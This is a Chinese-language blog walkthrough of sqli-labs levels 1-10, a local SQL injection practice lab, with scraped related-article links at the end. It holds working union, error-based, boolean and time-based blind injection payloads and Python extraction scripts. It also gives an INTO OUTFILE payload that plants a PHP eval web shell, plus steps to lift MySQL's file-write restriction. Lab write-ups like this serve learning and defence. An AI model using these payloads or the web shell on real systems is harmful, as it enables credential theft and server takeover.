Sqli-labs 1-10
Less 1-4(基础注入)
基础知识:
- table_schema:数据库的名称
- table_name:表的名称
- column_name:列的名称
- information_schema:表示所有信息,包括库、表、列
- information_schema.tables:表示所有表的信息
- information_schema.columns:表示所有列的信息
- limit 0,1 :从第0位(第一个)开始搜索1个
- group_concat:将结果联合在一行输出
查库
- select 1,2,group_concat(schema_name) from information_schema.schemata
Payload
http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(schema_name) from information_schema.schemata --+
selete 1,2是因为发现有三个输出位置,第一个没有结果,需要爆的的位置在2,3均可。
不一定一定是'闭合,不同题还可能是",)等等。
最后的+会被解析成空格,如果没有+,注释符号--会和'再一起导致报错。
查表
- select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'
Payload
http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+
查列
- select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'
payload
http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' --+
查字段
- select 1,2,group_concat(username,0x3a,password) from security.users
0x3a 16进制转10进制就是58 转字符就是;
payload与前面类似
Less 5-6(报错注入)
floor报错
- 1'后
+or (select 1 from (select count(*),concat((select table_name from information_schema.tables where table_schema=database() limit 3,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+
- 1'后
extractvalue报错
- 1'后
+or extractvalue(1, concat(1,(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1))) --+ - 上面是查表,其他的类似更改就行。
- 结果只能一个一个显示,故是limit x,1。要逐个查询则更改x的值。
- 1'后
Less 7 (导入文件注入)
- 一点补充,不同软件及系统下网站根目录:
linux:/usr/local/nginx/html,/home/wwwroot/default,/usr/share/nginx,/var/www/htm
apache:.../var/www/htm,.../var/www/html/htdocs
phpstudy(我就是这个):...\PHPTutorial\WWW\
那么该怎么获取到呢,这个板块我们无法拿到,可以在之前Less 1试试
payload:?id=-1' union select 1,@@basedir,@@datadir --+
成功拿到了地址
现在回到Less 7
payload:?id=1')) union select 1,2,'<?php @eval($_POST["theoyu"]);?>' into outfile "D:\\phpStudy\\PHPTutorial\\WWW\\hack.php" --+
发现并没能传入文件..
百度得知需要查看mysql有无写入权限:
- 打开mysql 输入
show variables like '%secure%';
- 这里是我已经更改过的,没有更改的
secure_file_priv这里value应该是NULL,需要打开mysql.ini加入secure_file_priv="/"
- 然后就是上面我的样子了!就可以传文件了。
- 之后就可以用蚁剑或者菜刀为所欲为了~
Less 8(布尔注入)
payload:?id=1' and (select length(database())=1) --+
这里不断更改1,2直到8,根据页面是否返回you are in......判断正确与否,这里用python脚本尝试爆破数据库长度和名字。
import requests
import re
import datetime
target_url='http://localhost/sqli-labs-master/Less-8/'
'''Get database length'''
def get_database_length(target_url):
print('Loading...')
for i in range(1,10):
payload = "?id=1' and (select length(database())=%s) --+"%i
htmlcontent = requests.get(target_url + payload).text
result = re.findall("You are in...........",htmlcontent)
if not result:
continue
else:
print('Database length: %s' %i)
return i
'''Get database name'''
def get_database_name(target_url):
db_name = ''
db_length = get_database_length(target_url)
letters = 'abcdefghijklmnopqrstuvwxyz'
for i in range(1,db_length + 1):
for letter in letters:
payload = "?id=1' and substr(database(),%s,1)='%s' --+" %(i, letter)
r = requests.get(target_url + payload)
if 'You are in' in r.text:
db_name += letter
print(db_name)
break
print('Database name:%s'%db_name)
return db_name
if __name__ == '__main__':
print('+---------------------------------------------------------------------------------------------+')
begin = datetime.datetime.now()
target_url = 'http://127.0.0.1/sqli-labs-master/Less-8/'
database = get_database_name(target_url)
print('+---------------------------------------------------------------------------------------------+')
结果如下:
也不知道为什么,速度真的很慢很慢很慢??平均每个字母尝试都画了一秒,一个字节就画了快一分钟(还是我没把数字包含进去),看视频里都是刷瞬间就弄完了,寻思我的电脑也没那么烂阿?
哦对了不想用python的话用burp suite也可以,很简单速度好像还快一些。
Less 9-10 (基于时间的盲注)
- 在这两个模块,无论我们输入什么,返回的结果都是一样的,只能用sleep函数,根据返回的时间进行判断。
import requests
import datetime
import time
global length
def database_len():
for i in range(1,10):
url='''http://localhost/sqli-labs-master/Less-9/'''
payload='''?id=1' and if(length(database())=%d,sleep(3),0) --+'''%i
start_time=time.time()
requests.get(url+payload)
if time.time()-start_time>3:
print('database length is ',i)
global length
length=i
break
else:
print(i)
database_len()
def database_name():
name=''
for j in range(1,length+1):
for i in 'abcdefghijklmnopqrstuvwxyz0123456789':
url='''http://localhost/sqli-labs-master/Less-9/'''
payload='''?id=1' and if(substr(database(),%d,1)='%s',sleep(3),0)--+'''%(j,i)
start_time=time.time()
requests.get(url+payload)
if time.time()-start_time>3:
name+=i
print(name)
break
print('database_name:',name)
database_name()
- 输出结果
Sqli-labs 1-10的更多相关文章
- SQLI LABS Basic Part(1-22) WriteUp
好久没有专门练SQL注入了,正好刷一遍SQLI LABS,复习巩固一波~ 环境: phpStudy(之前一直用自己搭的AMP,下了这个之后才发现这个更方便,可以切换不同版本的PHP,没装的小伙伴赶紧试 ...
- Sqli labs系列-less-3 。。。
原本想着找个搜索型的注入玩玩,毕竟昨天被实力嘲讽了 = = . 找了好长时间,我才发现,我没有 = = ,网上搜了一个存在搜索型注入的源码,我看了好长时间,楞没看出来从哪里搜索注入了....估计是我太 ...
- Sqli labs系列-less-2 详细篇
就今天晚上一个小插曲,瞬间感觉我被嘲讽了. SQL手工注入这个东西,杂说了吧,如果你好久不玩的话,一时说开了,你也只能讲个大概,有时候,长期不写写,你的构造语句还非常容易忘,要不我杂会被瞬间嘲讽了啊. ...
- Sqli labs系列-less-1 详细篇
要说 SQL 注入学习,网上众多的靶场,就属 Sqli labs 这个系列挺不错的,关卡达到60多关了,我自己也就打了不几关,一个挺不错的练习SQL注入的源码. 我一开始就准备等我一些原理篇总结完了, ...
- Sqli - Labs 靶场笔记(一)
Less - 1: 页面: URL: http://127.0.0.1/sqli-labs-master/Less-1/ 测试: 1.回显正常,说明不是数字型注入, http://127.0.0.1/ ...
- SQLI LABS Challenges Part(54-65) WriteUp
终于到了最后一部分,这些关跟之前不同的是这里是限制次数的. less-54: 这题比较好玩,10次之内爆出数据.先试试是什么类型: ?id=1' and '1 ==>>正常 ?id=1' ...
- SQLI LABS Advanced Part(23-37) WriteUp
继续继续!这里是高级部分! less-23: 提示输入id参数,尝试: ?id=1' and '1 返回的结果与?id=1相同,所以可以直接利用了. ?id=1' order by 5# 可是页面返回 ...
- SQL注入系列:SQLi Labs
前言 关于注释 说明:在SQL中--[空格]表示注释,但是在URL中--空格在发送请求的时候会把最后的空格去掉,所以用--+代替,因为+在被URL编码后会变成空格 MYSQL有三种常用注释: --[空 ...
- SQLI LABS Stacked Part(38-53) WriteUp
这里是堆叠注入部分 less-38: 这题啥过滤都没有,直接上: ?id=100' union select 1,2,'3 less-39: 同less-38: ?id=100 union selec ...
- SQLI DUMB SERIES-9&&10
第五关.第八关以及第九关.第十关都是使用盲注,除了第五关说的双注入外,也可使用时间注入法 (1)无论输入啥,都回显相同 (2) ?id=1' and sleep(3) --+ 发现有明显延迟,说明可以 ...
随机推荐
- 分布式任务调度平台 → XXL-JOB 实战
开心一刻 老师:谁知道鞭炮用英语怎么说? 甲:老师!老师!我知道,鞭炮的英文是pilipala. 老师:那闪电呢? 乙:kucha kucha 老师:那舞狮呢? 丙:dong dong qiang 老 ...
- Reactor 3 参考文档——如何选择操作符
如果一个操作符是专属于 Flux 或 Mono 的,那么会给它注明前缀.公共的操作符没有前缀.如果一个具体的用例涉及多个操作符的组合,这里以方法调用的方式展现,会以一个点(.)开头,并将参数置于圆括号 ...
- 基于视频压缩的实时监控系统-sprint3采集端传输子系统设计
由于jpg本来就是编码压缩后的格式,所有无需重复编码 传输子系统步骤:(1)初始化:a.socket(初始化tcp连接):b.将事件添加到epoll中 (2)事件处理:接收到网络包.发送完网络包 st ...
- python6.1创建类
class Dog(object): type1="宠物"#类变量 #初始化方法 def __init__(self,name,age,color): self.name=name ...
- Json字符串与QVariantList 对象相互转换
在Qt中QVariantList 使用起来很方便,如果涉及到数据的传输,需要将QVariantList 数据转换为JsonArray字符串,这个转换Qt已经实现好了,只需要调用接口就可以完成转换,代码 ...
- 90行代码让微信地球转起来,太酷了!(python实现)
1.微信地球 手机重启后打开微信的一瞬间,会看到一幅有名的图片,上面站着一个 张小龙 . 很多人学习python,不知道从何学起.很多人学习python,掌握了基本语法过后,不知道在哪里寻找案例上手. ...
- Docker 启动 OpenResty
Docker 启动 OpenResty OpenResty 是一个基于 Nginx 与 Lua 的高性能 Web 平台,其内部集成了大量精良的 Lua 库.第三方模块以及大多数的依赖项.用于方便地搭建 ...
- 教你几招,快速创建 MySQL 五百万级数据,愉快的学习各种优化技巧
我是风筝,公众号「古时的风筝」,一个兼具深度与广度的程序员鼓励师,一个本打算写诗却写起了代码的田园码农! 文章会收录在 JavaNewBee 中,更有 Java 后端知识图谱,从小白到大牛要走的路都在 ...
- 2020-06-13:Redis底层数据结构?
福哥答案2020-06-13: 福哥口诀法:简链字跳整 压快压 SDS simple synamic string:简单动态字符串.支持自动动态扩容的字节数组 .list :链表 .双端链表.dict ...
- 关于vector的自我补充
insert()函数,选择性插入. insert(v.begin()+i,x)意思就是把x插入vector数组v的第i位置上(也是迭代器的位置上),其后面的数字都会自动后移.注意i是从0开始的! er ...